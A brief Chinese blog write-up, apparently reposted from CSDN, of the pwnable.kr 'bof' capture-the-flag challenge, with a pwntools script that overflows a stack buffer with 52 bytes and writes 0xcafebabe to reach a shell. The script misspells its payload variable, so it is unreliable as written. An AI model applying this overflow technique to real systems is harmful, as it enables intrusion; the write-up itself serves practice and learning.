18.9.17 pwnable.kr----bof - 5 pt

直接调整ebp,修改renturnaddress,覆盖到key的地址后赋值0xcafebabe就可以了

ebp地址偏移量可一直接在IDA里面看见哟

上脚本

#coding=utf-8
from pwn import *
conn=remote("pwnable.kr",9000)
payload='a'*52+p32(0xcafebabe)
conn.recvuntil('overflow me : ')
conn.sendline(paylaod)
conn.interactive()

#daddy, I just pwned a buFFer :)

猜你喜欢

转载自blog.csdn.net/qq_42192672/article/details/82747802
pt
今日推荐